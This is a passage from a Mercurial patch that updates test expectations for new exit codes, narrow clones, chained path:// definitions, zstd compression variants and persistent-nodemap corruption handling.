+ [20]
$ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore
localignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=abort
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=warn --config merge.checkunknown=warn
b: replacing untracked file
localignored: replacing untracked file
--- a/tests/test-minirst.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-minirst.py Tue Apr 20 11:01:06 2021 -0400
@@ -159,6 +159,8 @@
:a: First item.
:ab: Second item. Indentation and wrapping
is handled automatically.
+:c\:d: a key with colon
+:efg\:\:hh: a key with many colon
Next list:
--- a/tests/test-minirst.py.out Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-minirst.py.out Tue Apr 20 11:01:06 2021 -0400
@@ -439,6 +439,8 @@
a First item.
ab Second item. Indentation and wrapping is
handled automatically.
+c:d a key with colon
+efg::hh a key with many colon
Next list:
@@ -456,6 +458,9 @@
wrapping is
handled
automatically.
+c:d a key with colon
+efg::hh a key with many
+ colon
Next list:
@@ -476,6 +481,10 @@
<dd>First item.
<dt>ab
<dd>Second item. Indentation and wrapping is handled automatically.
+ <dt>c:d
+ <dd>a key with colon
+ <dt>efg::hh
+ <dd>a key with many colon
</dl>
<p>
Next list:
--- a/tests/test-mq-qfold.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qfold.t Tue Apr 20 11:01:06 2021 -0400
@@ -235,7 +235,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
original message
--- a/tests/test-mq-qnew.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qnew.t Tue Apr 20 11:01:06 2021 -0400
@@ -310,7 +310,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
--- a/tests/test-mq-qrefresh-replace-log-message.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mq-qrefresh-replace-log-message.t Tue Apr 20 11:01:06 2021 -0400
@@ -191,7 +191,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
Fifth commit message
This is the 5th log message
@@ -235,7 +235,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
(rebuilding at failure of qrefresh bases on rev #0, and it causes
dropping status of "file2")
@@ -273,7 +273,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ sh "$TESTTMP/checkvisibility.sh"
====
@@ -315,7 +315,7 @@
rollback completed
qrefresh interrupted while patch was popped! (revert --all, qpush to recover)
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ sh "$TESTTMP/checkvisibility.sh"
====
--- a/tests/test-narrow-clone-no-ellipsis.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone-no-ellipsis.t Tue Apr 20 11:01:06 2021 -0400
@@ -26,6 +26,8 @@
dotencode
fncache
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-clone-stream.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone-stream.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,7 +39,7 @@
streaming all changes
remote: abort: server does not support narrow stream clones
abort: pull failed on remote
- [255]
+ [100]
Enable stream clone on the server
@@ -68,6 +68,8 @@
fncache (flat-fncache !)
generaldelta
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-clone.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-clone.t Tue Apr 20 11:01:06 2021 -0400
@@ -42,6 +42,8 @@
dotencode
fncache
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -62,15 +64,17 @@
$ cd ..
-BUG: local-to-local narrow clones should work, but don't.
+local-to-local narrow clones work
$ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10"
requesting all changes
- abort: server does not support narrow clones
- [255]
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 1 changes to 1 files
+ new changesets 5d21aaea77f8:26ce255d5b5d
$ hg tracked -R narrow-via-localpeer
- abort: repository narrow-via-localpeer not found
- [255]
+ I path:dir/src/f10
$ rm -Rf narrow-via-localpeer
narrow clone with a newline should fail
--- a/tests/test-narrow-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -105,7 +105,7 @@
remote: adding file changes
remote: transaction abort!
remote: rollback completed
- remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !)
+ remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !)
remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !)
abort: stream ended unexpectedly (got 0 bytes, expected 4)
[255]
@@ -218,8 +218,8 @@
remote: adding manifests
remote: adding file changes
remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !)
- remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !)
+ remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !)
remote: transaction abort! (lfs-on !)
remote: rollback completed (lfs-on !)
- remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !)
+ remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !)
abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !)
--- a/tests/test-narrow-pull.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-pull.t Tue Apr 20 11:01:06 2021 -0400
@@ -78,7 +78,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ hg id
223311e70a6f tip
@@ -147,7 +147,8 @@
$ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0
$ cd narrow2
$ hg pull -q -r 1
+ remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0
transaction abort!
rollback completed
abort: pull failed on remote
- [255]
+ [100]
--- a/tests/test-narrow-shallow-merges.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-shallow-merges.t Tue Apr 20 11:01:06 2021 -0400
@@ -179,7 +179,7 @@
$ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort
- ...2a20009de83e 000000000000 3ac1f5779de3 outside 10
+ ...2a20009de83e 3ac1f5779de3 000000000000 outside 10
...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9
...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12
...b844052e7b3b 000000000000 000000000000 outside 2c
--- a/tests/test-narrow-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,9 +110,9 @@
requesting all changes
remote: abort: depth must be positive, got 0
abort: pull failed on remote
- [255]
+ [100]
$ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1
requesting all changes
remote: abort: depth must be positive, got -1
abort: pull failed on remote
- [255]
+ [100]
--- a/tests/test-narrow-sparse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-sparse.t Tue Apr 20 11:01:06 2021 -0400
@@ -61,6 +61,8 @@
fncache
generaldelta
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-trackedcmd.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-trackedcmd.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,6 +110,8 @@
--clear whether to replace the existing narrowspec
--force-delete-local-changes forces deletion of local changes when
narrowing
+ --[no-]backup back up local changes when narrowing
+ (default: on)
--update-working-copy update working copy when the store has
changed
-e --ssh CMD specify ssh command to use
--- a/tests/test-narrow-widen.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-widen.t Tue Apr 20 11:01:06 2021 -0400
@@ -431,7 +431,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ hg l
$ hg bookmarks
no bookmarks set
--- a/tests/test-narrow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow.t Tue Apr 20 11:01:06 2021 -0400
@@ -61,7 +61,7 @@
[255]
Names with '.' in them are OK.
- $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c
+ $ hg clone --narrow ./master should-work --include a/.b/c
requesting all changes
adding changesets
adding manifests
@@ -492,3 +492,33 @@
searching for changes
looking for unused includes to remove
found no unused includes
+Test --no-backup
+ $ hg tracked --addinclude d0 --addinclude d2 -q
+ $ hg unbundle .hg/strip-backup/*-narrow.hg -q
+ $ rm .hg/strip-backup/*
+ $ hg tracked --auto-remove-includes --no-backup
+ comparing with ssh://user@dummy/master
+ searching for changes
+ looking for unused includes to remove
+ path:d0
+ path:d2
+ remove these unused includes (yn)? y
+ looking for local changes to affected paths
+ deleting data/d0/f.i
+ deleting data/d2/f.i
+ deleting meta/d0/00manifest.i (tree !)
+ deleting meta/d2/00manifest.i (tree !)
+ $ ls .hg/strip-backup/
+
+
+Test removing include while concurrently modifying file in that path
+ $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \
+ > --include d0 --include d1
+ $ cd narrow-concurrent-modify
+ $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0
+ comparing with ssh://user@dummy/master
+ searching for changes
+ looking for local changes to affected paths
+ deleting data/d0/f.i
+ deleting meta/d0/00manifest.i (tree !)
+ not deleting possibly dirty file d0/f
--- a/tests/test-obsolete-changeset-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete-changeset-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -158,11 +158,10 @@
list of changesets:
bec0734cd68e84477ba7fc1d13e6cff53ab70129
listing keys for "bookmarks"
- bundle2-output-bundle: "HG20", 4 parts total
+ bundle2-output-bundle: "HG20", 3 parts total
bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload
bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload
bundle2-output-part: "phase-heads" 24 bytes payload
- bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported
adding changesets
@@ -174,9 +173,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 1 changesets with 1 changes to 1 files (+1 heads)
--- a/tests/test-obsolete-distributed.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete-distributed.t Tue Apr 20 11:01:06 2021 -0400
@@ -151,12 +151,11 @@
list of changesets:
391a2bf12b1b8b05a72400ae36b26d50a091dc22
listing keys for "bookmarks"
- bundle2-output-bundle: "HG20", 5 parts total
+ bundle2-output-bundle: "HG20", 4 parts total
bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload
bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload
bundle2-output-part: "obsmarkers" streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
- bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported
adding changesets
@@ -170,9 +169,7 @@
bundle2-input-part: total payload size 143
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 48
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 5 parts total
+ bundle2-input-bundle: 4 parts total
checking for updated bookmarks
adding 1 changesets with 1 changes to 1 files (+1 heads)
1 new obsolescence markers
--- a/tests/test-obsolete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete.t Tue Apr 20 11:01:06 2021 -0400
@@ -97,8 +97,10 @@
# rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen
0 -1 -1 0 59 0 0 0 0 58 58 0 1 0
1 0 -1 59 118 59 59 0 0 58 116 0 1 0
- 2 1 -1 118 193 118 118 59 0 76 192 0 1 0
- 3 1 -1 193 260 193 193 59 0 66 258 0 2 0
+ 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !)
+ 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !)
+ 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !)
+ 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !)
$ hg debugobsolete
245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'}
@@ -1844,6 +1846,7 @@
ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791)
other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3)
extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37
+ extra: merged = yes
We should be able to see the log (without the deleted commit, of course)
$ hg log -G
@ 0:f53e9479dce5 (draft) [tip ] first
--- a/tests/test-parse-date.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-parse-date.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,43 +103,43 @@
$ hg log -d "--2"
abort: -2 must be nonnegative (see 'hg help dates')
- [255]
+ [10]
Whitespace only
$ hg log -d " "
abort: dates cannot consist entirely of whitespace
- [255]
+ [10]
Test date formats with '>' or '<' accompanied by space characters
$ hg log -d '>' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d '<' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d ' >' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d ' <' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d '> ' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d '< ' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d ' > ' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d ' < ' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d '>02/01' --template '{date|date}\n'
$ hg log -d '<02/01' --template '{date|date}\n'
--- a/tests/test-parseindex2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-parseindex2.py Tue Apr 20 11:01:06 2021 -0400
@@ -117,8 +117,8 @@
)
-def parse_index2(data, inline):
- index, chunkcache = parsers.parse_index2(data, inline)
+def parse_index2(data, inline, revlogv2=False):
+ index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2)
return list(index), chunkcache
--- a/tests/test-patchbomb.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-patchbomb.t Tue Apr 20 11:01:06 2021 -0400
@@ -2868,7 +2868,7 @@
dest#branch URIs:
$ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test
- comparing with ../t
+ comparing with ../t#test
From [test]: test
this patch series consists of 1 patches.
@@ -2998,7 +2998,7 @@
bad value setting
-----------------
- $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH
+ $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH
single rev
@@ -3006,7 +3006,7 @@
From [test]: test
this patch series consists of 1 patches.
- warning: invalid patchbomb.intro value "mpmwearaclownnose"
+ warning: invalid patchbomb.intro value "oliviawearaclownnose"
(should be one of always, never, auto)
-f test foo
MIME-Version: 1.0
@@ -3047,7 +3047,7 @@
$ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10'
this patch series consists of 1 patches.
- warning: invalid patchbomb.intro value "mpmwearaclownnose"
+ warning: invalid patchbomb.intro value "oliviawearaclownnose"
(should be one of always, never, auto)
-f me*@example.com ~foo/bar@example.com
MIME-Version: 1.0
--- a/tests/test-pathconflicts-basic.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pathconflicts-basic.t Tue Apr 20 11:01:06 2021 -0400
@@ -53,7 +53,7 @@
$ hg up file
a: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up --clean file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(activating bookmark file)
--- a/tests/test-pathconflicts-update.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pathconflicts-update.t Tue Apr 20 11:01:06 2021 -0400
@@ -49,7 +49,7 @@
$ hg up dir
a/b: untracked file conflicts with directory
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up dir --config merge.checkunknown=warn
a/b: replacing untracked file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -70,7 +70,7 @@
$ hg up dir
a/b: untracked file conflicts with directory
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up dir --config merge.checkunknown=warn
a/b: replacing untracked file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -89,7 +89,7 @@
$ hg up file
a/b: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up file --config merge.checkunknown=warn
a/b: replacing untracked files in directory
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -107,7 +107,7 @@
$ hg up link
a/b: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up link --config merge.checkunknown=warn
a/b: replacing untracked files in directory
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
--- a/tests/test-paths.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-paths.t Tue Apr 20 11:01:06 2021 -0400
@@ -211,3 +211,177 @@
000000000000
$ cd ..
+
+Testing path referencing other paths
+====================================
+
+basic setup
+-----------
+
+ $ ls -1
+ a
+ b
+ gpath1
+ suboptions
+ $ hg init chained_path
+ $ cd chained_path
+ $ cat << EOF > .hg/hgrc
+ > [paths]
+ > default=../a
+ > other_default=path://default
+ > path_with_branch=../branchy#foo
+ > other_branch=path://path_with_branch
+ > other_branched=path://path_with_branch#default
+ > pushdest=../push-dest
+ > pushdest:pushrev=default
+ > pushdest2=path://pushdest
+ > pushdest-overwrite=path://pushdest
+ > pushdest-overwrite:pushrev=foo
+ > EOF
+
+ $ hg init ../branchy
+ $ hg init ../push-dest
+ $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5'
+ $ hg log -G -T '{branch}\n' -R ../branchy
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ | o default
+ | |
+ | o default
+ | |
+ | o default
+ |/
+ o default
+
+
+ $ hg paths
+ default = $TESTTMP/a
+ gpath1 = http://hg.example.com/
+ other_branch = $TESTTMP/branchy#foo
+ other_branched = $TESTTMP/branchy#default
+ other_default = $TESTTMP/a
+ path_with_branch = $TESTTMP/branchy#foo
+ pushdest = $TESTTMP/push-dest
+ pushdest:pushrev = default
+ pushdest-overwrite = $TESTTMP/push-dest
+ pushdest-overwrite:pushrev = foo
+ pushdest2 = $TESTTMP/push-dest
+ pushdest2:pushrev = default
+
+test basic chaining
+-------------------
+
+ $ hg path other_default
+ $TESTTMP/a
+ $ hg pull default
+ pulling from $TESTTMP/a
+ no changes found
+ $ hg pull other_default
+ pulling from $TESTTMP/a
+ no changes found
+
+test inheritance of the #fragment part
+--------------------------------------
+
+ $ hg pull path_with_branch
+ pulling from $TESTTMP/branchy
+ adding changesets
+ adding manifests
+ adding file changes
+ added 6 changesets with 0 changes to 0 files
+ new changesets 1ea73414a91b:bcebb50b77de
+ (run 'hg update' to get a working copy)
+ $ hg pull other_branch
+ pulling from $TESTTMP/branchy
+ no changes found
+ $ hg pull other_branched
+ pulling from $TESTTMP/branchy
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 0 changes to 0 files (+1 heads)
+ new changesets 66f7d451a68b:2dc09a01254d
+ (run 'hg heads' to see heads)
+
+test inheritance of the suboptions
+----------------------------------
+
+ $ hg push pushdest
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 0 changes to 0 files
+ $ hg push pushdest2
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ no changes found
+ [1]
+ $ hg push pushdest-overwrite --new-branch
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 5 changesets with 0 changes to 0 files (+1 heads)
+
+Test chaining path:// definition
+--------------------------------
+
+This is currently unsupported, but feel free to implement the necessary
+dependency detection.
+
+ $ cat << EOF >> .hg/hgrc
+ > chain_path=path://other_default
+ > EOF
+
+ $ hg id
+ 000000000000
+ $ hg path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+ $ hg pull chain_path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+
+Doing an actual circle should always be an issue
+
+ $ cat << EOF >> .hg/hgrc
+ > rock=path://cissors
+ > cissors=path://paper
+ > paper=://rock
+ > EOF
+
+ $ hg id
+ 000000000000
+ $ hg path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+ $ hg pull chain_path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+
+Test basic error cases
+----------------------
+
+ $ cat << EOF > .hg/hgrc
+ > [paths]
+ > error-missing=path://unknown
+ > EOF
+ $ hg path
+ abort: cannot use `path://unknown`, "unknown" is not a known path
+ [255]
+ $ hg pull error-missing
+ abort: cannot use `path://unknown`, "unknown" is not a known path
+ [255]
+
--- a/tests/test-persistent-nodemap.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-persistent-nodemap.t Tue Apr 20 11:01:06 2021 -0400
@@ -2,6 +2,9 @@
Test the persistent on-disk nodemap
===================================
+
+#if no-rust
+
$ cat << EOF >> $HGRCPATH
> [format]
> use-persistent-nodemap=yes
@@ -9,6 +12,8 @@
> persistent-nodemap=yes
> EOF
+#endif
+
$ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow
$ cd test-repo
@@ -56,11 +61,12 @@
generaldelta: yes
share-safe: no
sparserevlog: yes
- sidedata: no
persistent-nodemap: yes
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
- compression: zlib
+ compression: zlib (no-zstd !)
+ compression: zstd (zstd !)
compression-level: default
$ hg debugbuilddag .+5000 --new-file
@@ -575,17 +581,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
persistent-nodemap: yes no no
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
- $ hg debugupgraderepo --run --no-backup --quiet
+ $ hg debugupgraderepo --run --no-backup
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
removed: persistent-nodemap
processed revlogs:
@@ -593,8 +601,17 @@
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ downgrading repository to not use persistent nodemap feature
+ removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob)
$ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
- [1]
+ 00changelog-*.nd (glob)
+ 00manifest-*.nd (glob)
+ undo.backup.00changelog.n
+ undo.backup.00manifest.n
$ hg debugnodemap --metadata
@@ -611,29 +628,42 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
persistent-nodemap: no yes no
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
- $ hg debugupgraderepo --run --no-backup --quiet
+ $ hg debugupgraderepo --run --no-backup
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
added: persistent-nodemap
+ persistent-nodemap
+ Speedup revision lookup by node id.
+
processed revlogs:
- all-filelogs
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository to use persistent nodemap feature
+ removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob)
$ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
00changelog-*.nd (glob)
00changelog.n
00manifest-*.nd (glob)
00manifest.n
+ undo.backup.00changelog.n
+ undo.backup.00manifest.n
$ hg debugnodemap --metadata
uid: * (glob)
@@ -649,7 +679,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
optimisations: re-delta-all
@@ -716,20 +747,88 @@
data-unused: 0
data-unused: 0.000%
+Test various corruption case
+============================
+
+Missing datafile
+----------------
+
+Test behavior with a missing datafile
+
+ $ hg clone --quiet --pull test-repo corruption-test-repo
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog-*.nd (glob)
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+ $ rm corruption-test-repo/.hg/store/00changelog*.nd
+ $ hg log -R corruption-test-repo -r .
+ changeset: 5005:90d5d3ba2fc4
+ tag: tip
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a2
+
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+
+Truncated data file
+-------------------
+
+Test behavior with a too short datafile
+
+rebuild the missing data
+ $ hg -R corruption-test-repo debugupdatecache
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog-*.nd (glob)
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+
+truncate the file
+
+ $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd`
+ $ f -s $datafilepath
+ corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob)
+ $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none
+ $ mv $datafilepath-tmp $datafilepath
+ $ f -s $datafilepath
+ corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob)
+
+Check that Mercurial reaction to this event
+
+ $ hg -R corruption-test-repo log -r . --traceback
+ changeset: 5005:90d5d3ba2fc4
+ tag: tip
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a2
+
+
+
stream clone
-------------
+============
The persistent nodemap should exist after a streaming clone
+Simple case
+-----------
+
+No race condition
+
$ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)'
adding [s] 00manifest.n (70 bytes)
- adding [s] 00manifest.i (313 KB)
- adding [s] 00manifest.d (452 KB)
adding [s] 00manifest-*.nd (118 KB) (glob)
adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
